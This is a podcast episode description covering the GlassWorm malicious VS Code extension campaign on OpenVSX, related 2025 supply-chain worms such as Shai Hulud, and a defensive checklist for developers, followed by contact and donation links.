Developer tools run with a level of trust most apps never get. They sit close to your code, your secrets, your terminals, your cloud logins, and your repo tokens. That trust is exactly what GlassWorm goes after.

In October 2025, researchers reported a cluster of compromised and lookalike VS Code extensions circulating via OpenVSX, with tens of thousands of installs linked to the initial wave. The reported behaviour is nasty and practical: harvesting GitHub, git, and npm credentials, scanning for Crypto wallet extensions, and adding capabilities like proxying and remote-access-style control.

What makes this story bigger than one campaign is the pattern behind it. Several write-ups tied the wider blast radius to the boring stuff that breaks everything, exposed marketplace tokens and compromised publisher access. There was also public pushback on the "worm" label from OpenVSX, so in the episode, we focus on what the malware actually does and how it spreads, rather than arguing about the headline.

follow-up, follow-up. Then it gets more uncomfortable. The reporting does not stop in October. There were follow-up findings later in 2025, including additional fake extensions impersonating popular tools, analysis of Rust-based implants and more novel command-and-control techniques.

We also zoom out to the wider 2025 threat landscape, where automation keeps showing up. Supply chain worms like Shai Hulud spread through npm by abusing maintainer accounts and installing lifecycle scripts. At the same time, academic work like Morris II explores how adversarial prompts could self-propagate through connected GenAI applications in "agent" ecosystems. It's the same core lesson: Identity compromise plus scale equals chaos.

If you build, ship, or self-host anything, this one's for you. You'll leave with a simple checklist: what to audit first (extensions, publishers, update history), what to lock down (tokens, MFA, CI secrets), and how to reduce blast radius when something slips through.

This episode uses a bit of AI magic to help research and structure it, but listeners are always welcome to email podcast@beitmenotyou.online if you want to do a fully human interview in the future.

Find everything else here: https://beitmenotyou.online

Support (no pressure):
Lightning: beitmenotyou@geyser.fund
Geyser: https://geyser.fund/beitmenotyou
BIC: bc1qkvc05av9u6ds2w5f8y4yevenqnqlc36zqt7jmp
ETH: 0xb2ad3d76dc2a6B283422e1B6c6957a1C5Ea857E3
SOL: 9pTYuMmU3guipw7Dp3EEuVUxhdVgjMYsFuhsCYbeYYNH
BASE: 0xb2ad3d76dc2a6B283422e1B6c6957a1C5Ea857E3
BINANCE: 0xb2ad3d76dc2a6B283422e1B6c6957a1C5Ea857E3
FAIT: https://revolut.me/beitmenotyou